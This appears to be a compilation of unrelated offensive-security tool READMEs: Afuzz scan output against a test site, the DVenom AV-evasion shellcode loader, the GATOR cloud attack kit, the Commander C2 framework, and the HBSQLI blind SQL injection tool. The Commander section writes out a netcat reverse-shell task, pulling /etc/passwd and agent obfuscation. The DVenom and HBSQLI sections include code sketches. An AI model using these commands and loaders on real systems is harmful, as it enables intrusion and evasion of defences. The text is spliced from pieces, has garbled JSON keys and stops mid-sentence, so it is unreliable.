+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+
| http://testphp.vulnweb.com/ | .idea/workspace.xml | 200 | | | 12437 | text/xml | 217 | 774 | check | |
| http://testphp.vulnweb.com/ | admin | 301 | http://testphp.vulnweb.com/admin/ | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
| http://testphp.vulnweb.com/ | login.php | 200 | | login page | 5009 | text/html | 120 | 432 | check | |
| http://testphp.vulnweb.com/ | .idea/.name | 200 | | | 6 | application/octet-stream | 1 | 1 | check | |
| http://testphp.vulnweb.com/ | .idea/vcs.xml | 200 | | | 173 | text/xml | 8 | 13 | check | |
| http://testphp.vulnweb.com/ | .idea/ | 200 | | Index of /.idea/ | 937 | text/html | 14 | 46 | whitelist | index of |
| http://testphp.vulnweb.com/ | cgi-bin/ | 403 | | 403 Forbidden | 276 | text/html | 10 | 28 | folder | 403 |
| http://testphp.vulnweb.com/ | .idea/encodings.xml | 200 | | | 171 | text/xml | 6 | 11 | check | |
| http://testphp.vulnweb.com/ | search.php | 200 | | search | 4218 | text/html | 104 | 364 | check | |
| http://testphp.vulnweb.com/ | product.php | 200 | | picture details | 4576 | text/html | 111 | 377 | check | |
| http://testphp.vulnweb.com/ | admin/ | 200 | | Index of /admin/ | 248 | text/html | 8 | 16 | whitelist | index of |
| http://testphp.vulnweb.com/ | .idea | 301 | http://testphp.vulnweb.com/.idea/ | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+
Json
{
"result": [
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/workspace.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 12437,
"content_type": "text/xml",
"lines": 217,
"words": 774,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/workspace.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "admin",
"status": 301,
"redirect": "http://testphp.vulnweb.com/admin/",
"title": "301 Moved Permanently",
"length": 169,
"content_type": "text/html",
"lines": 8,
"words ": 11,
"type": "folder",
"mark": "30x",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/admin"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "login.php",
"status": 200,
"redirect": "",
"title": "login page",
"length": 5009,
"content_type": "text/html",
"lines": 120,
"words": 432,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/login.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/.name",
"status": 200,
"redirect": "",
"title": "",
"length": 6,
"content_type": "application/octet-stream",
"lines": 1,
"words": 1,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/.name"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/vcs.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 173,
"content_type": "text/xml",
"lines": 8,
"words": 13,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/vcs.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/",
"status": 200,
"redirect": "",
"title": "Index of /.idea/",
"length": 937,
"content_type": "text/html",
"lines": 14,
"words": 46,
"type": "whitelist",
"mark": "index of",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "cgi-bin/",
"status": 403,
"redirect": "",
"title": "403 Forbidden",
"length": 276,
"content_type": "text/html",
"lines": 10,
"words": 28,
"type": "folder",
"mark": "403",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/cgi-bin/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/encodings.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 171,
"content_type": "text/xml",
"lines": 6,
"words": 11,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/encodings.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "search.php",
"status": 200,
"redirect": "",
"title": "search",
"length": 4218,
"content_type": "text/html",
"lines": 104,
"words": 364,
"t ype": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/search.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "product.php",
"status": 200,
"redirect": "",
"title": "picture details",
"length": 4576,
"content_type": "text/html",
"lines": 111,
"words": 377,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/product.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "admin/",
"status": 200,
"redirect": "",
"title": "Index of /admin/",
"length": 248,
"content_type": "text/html",
"lines": 8,
"words": 16,
"type": "whitelist",
"mark": "index of",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/admin/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea",
"status": 301,
"redirect": "http://testphp.vulnweb.com/.idea/",
"title": "301 Moved Permanently",
"length": 169,
"content_type": "text/html",
"lines": 8,
"words": 11,
"type": "folder",
"mark": "30x",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea"
}
],
"total": 12,
"targe t": "http://testphp.vulnweb.com/"
}
Summary:
The %EXT% keyword is replaced with the extensions from the -e flag. If no -e flag is given, the default extensions are used. Examples:
index.%EXT%
Passing the asp and aspx extensions will generate the following dictionary:
index
index.asp
index.aspx
%subdomain%.%ext%
%sub%.bak
%domain%.zip
%rootdomain%.zip
Passing https://test-www.hackerone.com and the php extension will generate the following dictionary:
test-www.hackerone.com.php
test-www.zip
test.zip
www.zip
testwww.zip
hackerone.zip
hackerone.com.zip
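A rough Python sketch of this keyword expansion (my simplified reading of the rules above, not Afuzz's implementation):
# Expand wordlist keywords like %EXT% and %sub% for a given target.
from urllib.parse import urlparse

def expand(word, url, exts):
    host = urlparse(url).hostname          # e.g. test-www.hackerone.com
    sub = host.split(".")[0]               # test-www
    root = ".".join(host.split(".")[-2:])  # hackerone.com
    out = []
    if "%EXT%" in word:
        out += [word.replace("%EXT%", e) for e in exts]
    elif "%subdomain%" in word:
        out.append(word.replace("%subdomain%", host))
    elif "%sub%" in word:
        out.append(word.replace("%sub%", sub))
    elif "%rootdomain%" in word:
        out.append(word.replace("%rootdomain%", root))
    elif "%domain%" in word:
        out.append(word.replace("%domain%", root.split(".")[0]))
    else:
        out.append(word)
    return out

print(expand("index.%EXT%", "https://test-www.hackerone.com", ["asp", "aspx"]))
print(expand("%sub%.bak", "https://test-www.hackerone.com", []))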
# ###### ### ### ###### ######
# # # # # # # # #
# # # # # # # # # #
# # ### # # # #
# # # # # # # #
##### # # # # # # #
# # # # # # # # #
### ### ### ### ###### ######
usage: afuzz [options]
An Automated Web Path Fuzzing Tool.
By RapidDNS (https://rapiddns.io)
options:
-h, --help show this help message and exit
-u URL, --url URL Target URL
-o OUTPUT, --output OUTPUT
Output file
-e EXTENSIONS, --extensions EXTENSIONS
Extension list separated by commas (Example: php,aspx,jsp)
-t THREAD, --thread THREAD
Number of threads
-d DEPTH, --depth DEPTH
Maximum recursion depth
-w WORDLIST, --wordlist WORDLIST
wordlist
-f, --fullpath fullpath
-p PROXY, --proxy PROXY
proxy, (ex:http://127.0.0.1:8080)
Some examples for how to use Afuzz - those are the most common arguments. If you need all, just use the -h argument.
afuzz -u https://target
afuzz -e php,html,js,json -u https://target
afuzz -e php,html,js -u https://target -d 3
The thread number (-t | --thread) reflects the number of separate brute-force processes, so the bigger the thread number is, the faster Afuzz runs. By default, the number of threads is 10, but you can increase it if you want to speed up the progress.
In spite of that, the speed still depends a lot on the response time of the server. And as a warning, we advise you to keep the thread number reasonable, because too many threads can cause a DoS.
afuzz -e aspx,jsp,php,htm,js,bak,zip,txt,xml -u https://target -t 50
The blacklist.txt and bad_string.txt files in the /db directory are blacklists, which can filter out some pages.
The blacklist.txt file is the same as dirsearch's.
The bad_string.txt file is a text file with one rule per line. The format is position==content, with == as the separator; position has the following options: header, body, regex, title.
The language.txt file contains the language-detection rules; the format is consistent with bad_string.txt. It is used to detect the development language of the website.
Thanks to open source projects for inspiration
Double Venom (DVenom) is a tool that helps red teamers bypass AVs by providing an encryption wrapper and loader for your shellcode.
These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.
To clone and run this application, you'll need Git installed on your computer. From your command line:
# Clone this repository
$ git clone https://github.com/zerx0r/dvenom
# Go into the repository
$ cd dvenom
# Build the application
$ go build ./cmd/dvenom/
After installation, you can run the tool using the following command:
./dvenom -h
To generate c# source code that contains encrypted shellcode.
Note that if AES256 has been selected as an encryption method, the Initialization Vector (IV) will be auto-generated.
./dvenom -e aes256 -key secretKey -l cs -m ntinject -procname explorer -scfile /home/zerx0r/shellcode.bin > ntinject.cs
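To illustrate the "encryption wrapper" idea in its simplest form, here is a Python sketch of XOR-encrypting a shellcode file with a repeating key (a generic illustration of the xor method; DVenom itself is written in Go and also emits the matching loader/decryption stub):
# XOR a shellcode blob with a repeating key, the simplest wrapper DVenom offers.
from itertools import cycle

key = b"secretKey"  # matches the -key argument in the example above
with open("shellcode.bin", "rb") as f:          # hypothetical input file
    shellcode = f.read()

encrypted = bytes(b ^ k for b, k in zip(shellcode, cycle(key)))
with open("shellcode.enc", "wb") as f:          # the loader reverses the XOR
    f.write(encrypted)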
Language | Supported Methods | Supported Encryption |
---|---|---|
C# | valloc, pinject, hollow, ntinject | xor, rot, aes256, rc4 |
Rust | pinject, hollow, ntinject | xor, rot, rc4 |
PowerShell | valloc, pinject | xor, rot |
ASPX | valloc | xor, rot |
VBA | valloc | xor, rot |
Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.
This project is licensed under the MIT License - see the LICENSE file for details.
Double Venom (DVenom) is intended for educational and ethical testing purposes only. Using DVenom for attacking targets without prior mutual consent is illegal. The tool developer and contributor(s) are not responsible for any misuse of this tool.
A cutting-edge utility designed exclusively for web security aficionados, penetration testers, and system administrators. WebSecProbe is your advanced toolkit for conducting intricate web security assessments with precision and depth. This robust tool streamlines the intricate process of scrutinizing web servers and applications, allowing you to delve into the technical nuances of web security and fortify your digital assets effectively.
WebSecProbe is designed to perform a series of HTTP requests to a target URL with various payloads in order to test for potential security vulnerabilities or misconfigurations. Here's a brief overview of what the code does:
Does This Tool Bypass 403 ?
It doesn't directly attempt to bypass a 403 Forbidden status code. The code's purpose is more about testing the behavior of the server when different requests are made, including requests with various payloads, headers, and URL variations. While some of the payloads and headers in the code might be used in certain scenarios to test for potential security misconfigurations or weaknesses, it doesn't guarantee that it will bypass a 403 Forbidden status code.
In summary, this code is a tool for exploring and analyzing a web server's responses to different requests, but whether or not it can bypass a 403 Forbidden status code depends on the specific configuration and security measures implemented by the target server.
pip install WebSecProbe
WebSecProbe <URL> <Path>
Example:
WebSecProbe https://example.com admin-login
from WebSecProbe.main import WebSecProbe
if __name__ == "__main__":
    url = 'https://example.com'  # Replace with your target URL
    path = 'admin-login'  # Replace with your desired path
    probe = WebSecProbe(url, path)
    probe.run()
TrafficWatch, a packet sniffer tool, allows you to monitor and analyze network traffic from PCAP files. It provides insights into various network protocols and can help with network troubleshooting, security analysis, and more.
Clone the repository:
git clone https://github.com/HalilDeniz/TrafficWatch.git
Navigate to the project directory:
cd TrafficWatch
Install the required dependencies:
pip install -r requirements.txt
python3 trafficwatch.py --help
usage: trafficwatch.py [-h] -f FILE [-p {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}] [-c COUNT]
Packet Sniffer Tool
options:
-h, --help show this help message and exit
-f FILE, --file FILE Path to the .pcap file to analyze
-p {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}, --protocol {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}
Filter by specific protocol
-c COUNT, --count COUNT
Number of packets to display
To analyze packets from a PCAP file, use the following command:
python trafficwatch.py -f path/to/your.pcap
To specify a protocol filter (e.g., HTTP) and limit the number of displayed packets (e.g., 10), use:
python trafficwatch.py -f path/to/your.pcap -p HTTP -c 10
-f or --file: Path to the PCAP file for analysis.
-p or --protocol: Filter packets by protocol (ARP, ICMP, TCP, UDP, DNS, DHCP, HTTP, SNMP, LLMNR, NetBIOS).
-c or --count: Limit the number of displayed packets.
Contributions are welcome! If you want to contribute to TrafficWatch, please follow our contribution guidelines.
If you have any questions, comments, or suggestions about TrafficWatch, please feel free to contact me:
This project is licensed under the MIT License.
Thank you for considering supporting me! Your support enables me to dedicate more time and effort to creating useful tools like DNSWatch and developing new projects. By contributing, you're not only helping me improve existing tools but also inspiring new ideas and innovations. Your support plays a vital role in the growth of this project and future endeavors. Together, let's continue building and learning. Thank you!
GATOR (GCP Attack Toolkit for Offensive Research) is a tool designed to aid in researching and exploiting Google Cloud environments. It offers a comprehensive range of modules tailored to support users in various attack stages, spanning from Reconnaissance to Impact.
Resource Category | Primary Module | Command Group | Operation | Description |
---|---|---|---|---|
User Authentication | auth | - | activate | Activate a Specific Authentication Method |
- | add | Add a New Authentication Method | ||
- | delete | Remove a Specific Authentication Method | ||
- | list | List All Available Authentication Methods | ||
Cloud Functions | functions | - | list | List All Deployed Cloud Functions |
- | permissions | Display Permissions for a Specific Cloud Function | ||
- | triggers | List All Triggers for a Specific Cloud Function | ||
Cloud Storage | storage | buckets | list | List All Storage Buckets |
permissions | Display Permissions for Storage Buckets | |||
Compute Engine | compute | instances | add-ssh-key | Add SSH Key to Compute Instances |
Python 3.11 or newer should be installed. You can verify your Python version with the following command:
python --version
git clone https://github.com/anrbn/GATOR.git
cd GATOR
python setup.py install
pip install gator-red
Have a look at the GATOR Documentation for an explained guide on using GATOR and its modules!
If you encounter any problems with this tool, I encourage you to let me know. Here are the steps to report an issue:
Check Existing Issues: Before reporting a new issue, please check the existing issues in this repository. Your issue might have already been reported and possibly even resolved.
Create a New Issue: If your problem hasn't been reported, please create a new issue in the GitHub repository. Click the Issues tab and then click New Issue.
Describe the Issue: When creating a new issue, please provide as much information as possible. Include a clear and descriptive title, explain the problem in detail, and provide steps to reproduce the issue if possible. Including the version of the tool you're using and your operating system can also be helpful.
Submit the Issue: After you've filled out all the necessary information, click Submit new issue.
Your feedback is important, and will help improve the tool. I appreciate your contribution!
I'll be reviewing reported issues on a regular basis and try to reproduce the issue based on your description and will communicate with you for further information if necessary. Once I understand the issue, I'll work on a fix.
Please note that resolving an issue may take some time depending on its complexity. I appreciate your patience and understanding.
I warmly welcome and appreciate contributions from the community! If you're interested in contributing on any existing or new modules, feel free to submit a pull request (PR) with any new/existing modules or features you'd like to add.
Once you've submitted a PR, I'll review it as soon as I can. I might request some changes or improvements before merging your PR. Your contributions play a crucial role in making the tool better, and I'm excited to see what you'll bring to the project!
Thank you for considering contributing to the project.
If you have any questions regarding the tool or any of its modules, please check out the documentation first. I've tried to provide clear, comprehensive information related to all of its modules. If however your query is not yet solved or you have a different question altogether please don't hesitate to reach out to me via Twitter or LinkedIn. I'm always happy to help and provide support. :)
SecuSphere is a comprehensive DevSecOps platform designed to streamline and enhance your organization's security posture throughout the software development life cycle. Our platform serves as a centralized hub for vulnerability management, security assessments, CI/CD pipeline integration, and fostering DevSecOps practices and culture.
At the heart of SecuSphere is a powerful vulnerability management system. Our platform collects, processes, and prioritizes vulnerabilities, integrating with a wide array of vulnerability scanners and security testing tools. Risk-based prioritization and automated assignment of vulnerabilities streamline the remediation process, ensuring that your teams tackle the most critical issues first. Additionally, our platform offers robust dashboards and reporting capabilities, allowing you to track and monitor vulnerability status in real-time.
SecuSphere integrates seamlessly with your existing CI/CD pipelines, providing real-time security feedback throughout your development process. Our platform enables automated triggering of security scans and assessments at various stages of your pipeline. Furthermore, SecuSphere enforces security gates to prevent vulnerable code from progressing to production, ensuring that security is built into your applications from the ground up. This continuous feedback loop empowers developers to identify and fix vulnerabilities early in the development cycle.
SecuSphere offers a robust framework for consuming and analyzing security assessment reports from various CI/CD pipeline stages. Our platform automates the aggregation, normalization, and correlation of security findings, providing a holistic view of your application's security landscape. Intelligent deduplication and false-positive elimination reduce noise in the vulnerability data, ensuring that your teams focus on real threats. Furthermore, SecuSphere integrates with ticketing systems to facilitate the creation and management of remediation tasks.
SecuSphere goes beyond tools and technology to help you drive and accelerate the adoption of DevSecOps principles and practices within your organization. Our platform provides security training and awareness for developers, security, and operations teams, helping to embed security within your development and operations processes. SecuSphere aids in establishing secure coding guidelines and best practices and fosters collaboration and communication between security, development, and operations teams. With SecuSphere, you'll create a culture of shared responsibility for security, enabling you to build more secure, reliable software.
Embrace the power of integrated DevSecOps with SecuSphere β secure your software development, from code to cloud.
SecuSphere offers built-in dashboards and reporting capabilities that allow you to easily track and monitor the status of vulnerabilities. With our risk-based prioritization and automated assignment features, vulnerabilities are efficiently managed and sent to the relevant teams for remediation.
SecuSphere provides a comprehensive REST API and Web Console. This allows for greater flexibility and control over your security operations, ensuring you can automate and integrate SecuSphere into your existing systems and workflows as seamlessly as possible.
For more information please refer to our Official Rest API Documentation
SecuSphere integrates with popular ticketing systems, enabling the creation and management of remediation tasks directly within the platform. This helps streamline your security operations and ensure faster resolution of identified vulnerabilities.
SecuSphere is not just a tool, it's a comprehensive solution that drives and accelerates the adoption of DevSecOps principles and practices. We provide security training and awareness for developers, security, and operations teams, and aid in establishing secure coding guidelines and best practices.
Get started with SecuSphere using our comprehensive user guide.
You can install SecuSphere by cloning the repository, setting up locally, or using Docker.
$ git clone https://github.com/SecurityUniversalOrg/SecuSphere.git
Navigate to the source directory and run the Python file:
$ cd src/
$ python run.py
Build and run the Dockerfile in the cicd directory:
$ # From repository root
$ docker build -t secusphere:latest .
$ docker run secusphere:latest
Use Docker Compose in the ci_cd/iac/ directory:
$ cd ci_cd/iac/
$ docker-compose -f secusphere.yml up
Pull the latest version of SecuSphere from Docker Hub and run it:
$ docker pull securityuniversal/secusphere:latest
$ docker run -p 8081:80 -d securityuniversal/secusphere:latest
We value your feedback and are committed to providing the best possible experience with SecuSphere. If you encounter any issues or have suggestions for improvement, please create an issue in this repository or contact our support team.
We welcome contributions to SecuSphere. If you're interested in improving SecuSphere or adding new features, please read our contributing guide.
Commander is a command and control (C2) framework written in Python, Flask and SQLite. It comes with two agents, written in Python and C.
Under Continuous Development
Not script-kiddie friendly
Python >= 3.6 is required, along with the following dependencies:
Linux for admin.py and c2_server.py (untested on Windows).
apt install libcurl4-openssl-dev libb64-dev
apt install openssl
pip3 install -r requirements.txt
First, create the required certs and keys:
# if you want to secure your key with a passphrase, omit the -nodes flag
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt -days 365 -nodes
Start the admin.py module first in order to create a local SQLite db file:
python3 admin.py
Continue by running the server
python3 c2_server.py
And last, the agent. The Python agent can be run directly, but the C agent needs to be compiled first.
# python agent
python3 agent.py
# C agent
gcc agent.c -o agent -lcurl -lb64
./agent
By default, both the agents and the server communicate over TLS with base64 encoding. The communication endpoint is set to 127.0.0.1:5000; if a different endpoint is needed, change it in the agents' source files.
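For example, the endpoint typically lives in constants near the top of the agent source; the names below are purely hypothetical, so check the actual files under Agents/:
# Purely hypothetical example of the kind of values to edit in the agent source;
# the real variable names in the Agents files may differ.
SERVER_HOST = "10.0.0.5"  # instead of the default 127.0.0.1
SERVER_PORT = 5000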
As the Operator/Administrator, you can use the following commands to control your agents:
Commands:
task add arg c2-commands
Add a task to an agent, to a group or on all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
c2-commands: possible values are c2-register c2-shell c2-sleep c2-quit
c2-register: Triggers the agent to register again.
c2-shell cmd: It takes a shell command for the agent to execute, e.g. c2-shell whoami
cmd: The command to execute.
c2-sleep: Configure the interval at which an agent checks for tasks.
c2-session port: Instructs the agent to open a shell session with the server to this port.
port: The port to connect to. If it is not provided it defaults to 5555.
c2-quit: Forces an agent to quit.
task delete arg
Delete a task from an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show agent arg
Displays info for all the available agents or for a specific agent.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show task arg
Displays the task of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show result arg
Displays the history/result of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
find active agents
Drops the database so that the active agents will be registered again.
exit
Bye Bye!
Sessions:
sessions server arg [port]
Controls a session handler.
arg: can have the following values: 'start', 'stop', 'status'
port: optional for the 'start' arg; if it is not provided it defaults to 5555. This argument defines the port of the sessions server
sessions select arg
Select in which session to attach.
arg: the index from the 'sessions list' result
sessions close arg
Close a session.
arg: the index from the 'sessions list' result
sessions list
Displays the available sessions
local-ls directory
Lists the files in the selected directory on your host
download 'file'
Downloads the 'file' locally into the current directory
upload 'file'
Uploads a file into the directory where the agent is currently running
Special attention should be given to the 'find active agents' command. This command deletes all the tables and creates them again. It might sound scary, but it is not; at least that is what I believe :P
The idea behind this functionality is that the c2 server can ask an agent to re-register when it does not recognize it. So, since we want to clear the db of old unused entries and at the same time find all the currently active hosts, we can drop the tables and trigger the re-register mechanism of the c2 server. See below for the re-registration mechanism.
Below you can find a normal flow diagram
If the environment experiences a major failure, such as a corrupted database or some other critical failure, the re-registration mechanism ensures that we don't lose our connection with our agents.
More specifically, if we lose the database we no longer have any information about the uuids we are receiving, so we can't set tasks on them. The agents will keep trying to retrieve their tasks, and since we don't recognize them we will ask them to register again, so that we can insert them into our database and control them again.
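Conceptually, the server-side check behaves like the following sketch (illustrative only, not Commander's actual code):
# Illustrative sketch of the re-registration check on the c2 server:
# an unknown uuid gets a c2-register order instead of its task list.
def handle_task_request(uuid, db):
    agent = db.lookup_agent(uuid)  # hypothetical db helper
    if agent is None:
        # Unknown agent (e.g. after dropping the tables): ask it to register
        return {"command": "c2-register"}
    return {"tasks": db.pending_tasks(uuid)}  # hypothetical db helper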
Below is the flow diagram for this case.
To set up your environment, start admin.py first, then c2_server.py, and finally run the agent. After that, you can check the available agents:
# show all available agents
show agent all
To instruct all the agents to run the command "id" you can do it like this:
# run the id command on all agents
task add all c2-shell id
# check the results of a specific agent
show result 85913eb1245d40eb96cf53eaf0b1e241
You can also change the interval at which the agents check for tasks, e.g. to 30 seconds, like this:
# to set it for all agents
task add all c2-sleep 30
To open a session with one or more of your agents do the following.
# find the agent/uuid
show agent all
# enable the server to accept connections
sessions server start 5555
# add a task for a session to your preferred agent
task add your_prefered_agent_uuid_here c2-session 5555
# display a list of available connections
sessions list
# select to attach to one of the sessions, let's select 0
sessions select 0
# run a command
id
# download the passwd file locally
download /etc/passwd
# list your files locally to check that passwd was created
local-ls
# upload a file (test.txt) in the directory where the agent is
upload test.txt
# return to the main cli
go back
# check if the server is running
sessions server status
# stop the sessions server
sessions server stop
If for some reason you want to run another external session, e.g. with netcat or metasploit, do the following.
# show all available agents
show agent all
# first open a netcat on your machine
nc -vnlp 4444
# add a task to open a reverse shell for a specific agent
task add 85913eb1245d40eb96cf53eaf0b1e241 c2-shell nc -e /bin/sh 192.168.1.3 4444
This way you will have a 'die hard' shell: even if you get disconnected, it will come back up immediately. Only the interactive commands will make it die permanently.
The Python agent offers obfuscation using basic AES-ECB encryption and base64 encoding.
Edit the obfuscator.py file and change the 'key' value to a 16-character key in order to create a custom payload. The output of the new agent can be found in Agents/obs_agent.py.
You can run it like this:
python3 obfuscator.py
# and to run the agent, do as usual
python3 obs_agent.py
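For reference, the underlying transformation is plain AES-ECB plus base64; below is a minimal sketch using pycryptodome (obfuscator.py's actual implementation may differ in details):
# Minimal AES-ECB + base64 sketch using pycryptodome (pip3 install pycryptodome);
# illustrative of the scheme, not a copy of obfuscator.py.
import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad

KEY = b"0123456789abcdef"  # must be exactly 16 characters, as required above

def obfuscate(payload):
    cipher = AES.new(KEY, AES.MODE_ECB)
    return base64.b64encode(cipher.encrypt(pad(payload, AES.block_size)))

def deobfuscate(blob):
    cipher = AES.new(KEY, AES.MODE_ECB)
    return unpad(cipher.decrypt(base64.b64decode(blob)), AES.block_size)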
To run the c2 server under gunicorn:
gunicorn -w 4 "c2_server:create_app()" --access-logfile=- -b 0.0.0.0:5000 --certfile server.crt --keyfile server.key
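The "c2_server:create_app()" argument tells gunicorn to call an application factory; in general such a Flask factory looks like the sketch below (Commander's real create_app() will differ):
# Generic Flask application-factory pattern, as invoked by gunicorn above;
# not Commander's actual create_app() implementation.
from flask import Flask

def create_app():
    app = Flask(__name__)

    @app.route("/health")  # hypothetical route, for illustration only
    def health():
        return "ok"

    return app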
To package the Python agent as a single binary with PyInstaller:
pip install pyinstaller
pyinstaller --onefile agent.py
The binary can be found under the dist directory.
In case something fails, you may need to update your Python and pip libs. If it continues failing, then... well... life happened.
Create new certs for each engagement
Back up your c2.db; it is easy... it's just a file
pytest was used for the testing. You can run the tests like this:
cd tests/
py.test
Be careful: you must run the tests inside the tests directory, otherwise your c2.db will be overwritten and you will lose your data.
To check the code coverage and produce a nice html report you can use this:
# pip3 install pytest-cov
python -m pytest --cov=Commander --cov-report html
Disclaimer: This tool is only intended to be a proof of concept demonstration tool for authorized security testing. Running this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.
JSpector is a Burp Suite extension that passively crawls JavaScript files and automatically creates issues with URLs, endpoints and dangerous methods found in the JS files.
Before installing JSpector, you need to have Jython installed on Burp Suite.
Go to the Extensions tab.
Click the Add button in the Installed tab.
In the Extension Details dialog box, select Python as the Extension Type.
Click the Select file button and navigate to the JSpector.py file.
Click the Next button.
Click the Close button.
JSpector will start reporting its results directly in the Dashboard tab.
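For context, a passive Burp scanner check in Jython looks roughly like the sketch below; this is a stripped-down illustration of the general pattern using the standard Burp Extender API, not JSpector's actual source code.
# Stripped-down Jython sketch of a passive JS-scanning Burp extension.
# Illustrative only: JSpector itself raises proper Burp issues for its findings.
import re
from burp import IBurpExtender, IScannerCheck

URL_RE = re.compile(r'https?://[^\s"\'<>]+')

class BurpExtender(IBurpExtender, IScannerCheck):
    def registerExtenderCallbacks(self, callbacks):
        self._helpers = callbacks.getHelpers()
        callbacks.setExtensionName("JS URL sketch")
        callbacks.registerScannerCheck(self)

    def doPassiveScan(self, baseRequestResponse):
        # Only look at JavaScript files
        url = self._helpers.analyzeRequest(baseRequestResponse).getUrl()
        if not url.getPath().endswith(".js"):
            return None
        body = self._helpers.bytesToString(baseRequestResponse.getResponse())
        for found in sorted(set(URL_RE.findall(body))):
            print("URL found in %s: %s" % (url.getPath(), found))
        return None  # a real extension would return IScanIssue objects here

    def doActiveScan(self, baseRequestResponse, insertionPoint):
        return None  # passive-only

    def consolidateDuplicateIssues(self, existingIssue, newIssue):
        return 0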
HBSQLI is an automated command-line tool for performing Header Based Blind SQL injection attacks on web applications. It automates the process of detecting Header Based Blind SQL injection vulnerabilities, making it easier for security researchers, penetration testers and bug bounty hunters to test the security of web applications.
This tool is intended for authorized penetration testing and security assessment purposes only. Any unauthorized or malicious use of this tool is strictly prohibited and may result in legal action.
The authors and contributors of this tool do not take any responsibility for any damage, legal issues, or other consequences caused by the misuse of this tool. The use of this tool is solely at the user's own risk.
Users are responsible for complying with all applicable laws and regulations regarding the use of this tool, including but not limited to, obtaining all necessary permissions and consents before conducting any testing or assessment.
By using this tool, users acknowledge and accept these terms and conditions and agree to use this tool in accordance with all applicable laws and regulations.
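The core idea HBSQLI automates is a timing check: inject a time-delay payload into an HTTP header and see whether the response is delayed accordingly. Below is a minimal sketch of that technique using requests (illustrative only, not HBSQLI's actual code; the target URL is a placeholder):
# Minimal timing-check sketch for header-based blind SQLi (not HBSQLI's code).
import time
import requests

DELAY = 30  # the payload file's payloads sleep for 30 seconds

def is_delayed(url, header, payload):
    start = time.time()
    try:
        requests.get(url, headers={header: payload}, timeout=DELAY + 15)
    except requests.exceptions.Timeout:
        return True  # never answered within the window: treat as delayed
    return time.time() - start >= DELAY

# Placeholder target: only test hosts you are authorized to assess
if is_delayed("https://target.com", "X-Forwarded-For", "' AND SLEEP(30)-- -"):
    print("possible blind SQLi via X-Forwarded-For")
A real scanner would also record a baseline response time first, so that a generally slow server is not mistaken for a vulnerable one.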
Install HBSQLI with the following steps:
$ git clone https://github.com/SAPT01/HBSQLI.git
$ cd HBSQLI
$ pip3 install -r requirements.txt
usage: hbsqli.py [-h] [-l LIST] [-u URL] -p PAYLOADS -H HEADERS [-v]
options:
-h, --help show this help message and exit
-l LIST, --list LIST To provide list of urls as an input
-u URL, --url URL To provide single url as an input
-p PAYLOADS, --payloads PAYLOADS
To provide payload file having Blind SQL Payloads with delay of 30 sec
-H HEADERS, --headers HEADERS
To provide header file having HTTP Headers which are to be injected
-v, --verbose Run on verbose mode
$ python3 hbsqli.py -u "https://target.com" -p payloads.txt -H headers.txt -v
$ python3 hbsqli.py -l urls.txt -p payloads.txt -H headers.txt -v
There are basically two modes: verbose, which shows you the whole process and the status of each test, and non-verbose, which just prints the vulnerable ones on the screen. To enable verbose mode, just add -v to your command.
You can use the provided payload file or a custom payload file; just remember that the delay in each payload should be set to 30 seconds.
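For reference, typical time-based payloads with a 30-second delay look like this (generic textbook examples annotated with the target DBMS, not necessarily the payloads shipped in the repo; an actual payload file would contain one payload per line without annotations):
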